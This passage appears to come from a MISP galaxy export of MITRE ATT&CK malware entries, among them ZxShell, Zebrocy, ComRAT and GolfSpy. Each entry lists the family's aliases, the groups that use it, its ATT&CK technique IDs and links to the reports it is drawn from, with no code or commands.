- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

Table 4605. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0213">https://attack.mitre.org/software/S0213</a></td>
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<tr>
<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
</tr>
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</table>

**HummingWhale - S0321**

[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)

The tag is: *misp-galaxy:mitre-malware="HummingWhale - S0321"*

HummingWhale - S0321 is also known as:

- HummingWhale

HummingWhale - S0321 has relationships with:


Table 4606. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0321">https://attack.mitre.org/software/S0321</a></td>
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<tr>
<td><a href="http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/">http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/</a></td>
</tr>
</tbody>
</table>

**WireLurker - S0312**

[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)

The tag is: *misp-galaxy:mitre-malware="WireLurker - S0312"*

WireLurker - S0312 is also known as:

- WireLurker

WireLurker - S0312 has relationships with:
• similar: misp-galaxy:malpedia="WireLurker (OS X)" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0312">https://attack.mitre.org/software/S0312</a></td>
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</table>

**RATANKBA - S0241**

[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)

The tag is: **misp-galaxy:mitre-malware="RATANKBA - S0241"**

RATANKBA - S0241 is also known as:

• RATANKBA

RATANKBA - S0241 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-
Table 4608. Table References

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<td><a href="https://attack.mitre.org/software/S0241">https://attack.mitre.org/software/S0241</a></td>
</tr>
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</table>

**HAPPYWORK - S0214**

[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)

The tag is: `misp-galaxy:mitre-malware="HAPPYWORK - S0214"`

HAPPYWORK - S0214 is also known as:

- HAPPYWORK

HAPPYWORK - S0214 has relationships with:

- similar: `misp-galaxy:tool="HAPPYWORK"` with `estimative-language:likelihood-probability="likely"`
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0214">https://attack.mitre.org/software/S0214</a></td>
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<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
</tr>
</tbody>
</table>

StreamEx - S0142

[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)

The tag is: misp-galaxy:mitre-malware="StreamEx - S0142"

StreamEx - S0142 is also known as:

• StreamEx

StreamEx - S0142 has relationships with:

• similar: misp-galaxy:tool="StreamEx" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
**GolfSpy - S0421**

[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097). *(Citation: Trend Micro Bouncing Golf 2019)*

The tag is: `misp-galaxy:mitre-malware="GolfSpy - S0421"`

GolfSpy - S0421 is also known as:

- GolfSpy

GolfSpy - S0421 has relationships with:

- `uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"` with estimative-language:likelihood-probability="almost-certain"
- `uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with estimative-language:likelihood-probability="almost-certain"
- `uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"
- `uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- `uses: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"

Table 4611. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0421">https://attack.mitre.org/software/S0421</a></td>
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</table>

**Pisloader - S0124**

[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)

The tag is: misp-galaxy:mitre-malware="Pisloader - S0124"

Pisloader - S0124 is also known as:

• Pisloader

Pisloader - S0124 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4612. Table References

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<td><a href="https://attack.mitre.org/software/S0124">https://attack.mitre.org/software/S0124</a></td>
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</table>

ZxShell - S0412

[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )

The tag is: misp-galaxy:mitre-malware="ZxShell - S0412"

ZxShell - S0412 is also known as:

• ZxShell

• Sensocode

ZxShell - S0412 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 4613. Table References

Links

https://attack.mitre.org/software/S0412
https://content.fireeye.com/apt-41/rpt-apt41

KARAE - S0215

[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)

The tag is: *misp-galaxy:mitre-malware="KARAE - S0215"

KARAE - S0215 is also known as:

• KARAE

KARAE - S0215 has relationships with:

• similar: misp-galaxy:tool="KARAE" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4614. Table References

Links
FatDuke - S0512

FatDuke - S0512 is a backdoor used by APT29 since at least 2016. (Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="FatDuke - S0512"

FatDuke - S0512 is also known as:

- FatDuke

FatDuke - S0512 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4615. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0512">https://attack.mitre.org/software/S0512</a></td>
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</table>

**EvilGrab - S0152**

[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: *misp-galaxy:mitre-malware="EvilGrab - S0152"*

EvilGrab - S0152 is also known as:

• EvilGrab

EvilGrab - S0152 has relationships with:

• similar: misp-galaxy:tool="EvilGrab" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:malpedia="EvilGrab" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
Remsec - S0125

[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)

The tag is: `misp-galaxy:mitre-malware="Remsec - S0125"`

Remsec - S0125 is also known as:

- Remsec
- Backdoor.Remsec
- ProjectSauron

Remsec - S0125 has relationships with:

- similar: `misp-galaxy:malpedia="Remsec"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002"` with estimative-
Zebrocy - S0251

[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020)

The tag is: **misp-galaxy:mitre-malware="Zebrocy - S0251"**

Zebrocy - S0251 is also known as:

- Zebrocy
- Zekapab

Zebrocy - S0251 has relationships with:

- **uses:** misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- **uses:** misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
- **uses:** misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 4618. Table References

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<td><a href="https://attack.mitre.org/software/S0251">https://attack.mitre.org/software/S0251</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/">https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/</a></td>
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<tr>
<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b">https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b</a></td>
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<tr>
<td><a href="https://www.cyberscoop.com/apt28-brexit-phishing-accenture/">https://www.cyberscoop.com/apt28-brexit-phishing-accenture/</a></td>
</tr>
</tbody>
</table>

ComRAT - S0126

[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)
The tag is: `misp-galaxy:mitre-malware="ComRAT - S0126"`

ComRAT - S0126 is also known as:

- ComRAT

ComRAT - S0126 has relationships with:

- similar: `misp-galaxy:rat="ComRAT"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Agent.BTZ"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="Agent.BTZ"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

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</table>

**POORAIM - S0216**

[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)

The tag is: *misp-galaxy:mitre-malware="POORAIM - S0216"*

POORAIM - S0216 is also known as:

• POORAIM

POORAIM - S0216 has relationships with:

• similar: misp-galaxy:tool="POORAIM" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-
Catchamas - S0261

[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)

The tag is: misp-galaxy:mitre-malware="Catchamas - S0261"

Catchamas - S0261 is also known as:

- Catchamas

Catchamas - S0261 has relationships with:

- uses:  misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses:  misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses:  misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
- uses:  misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses:  misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses:  misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses:  misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
Komplex - S0162

[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).

The tag is: *misp-galaxy:mitre-malware="Komplex - S0162"*

Komplex - S0162 is also known as:

- Komplex

Komplex - S0162 has relationships with:

- similar: *misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"
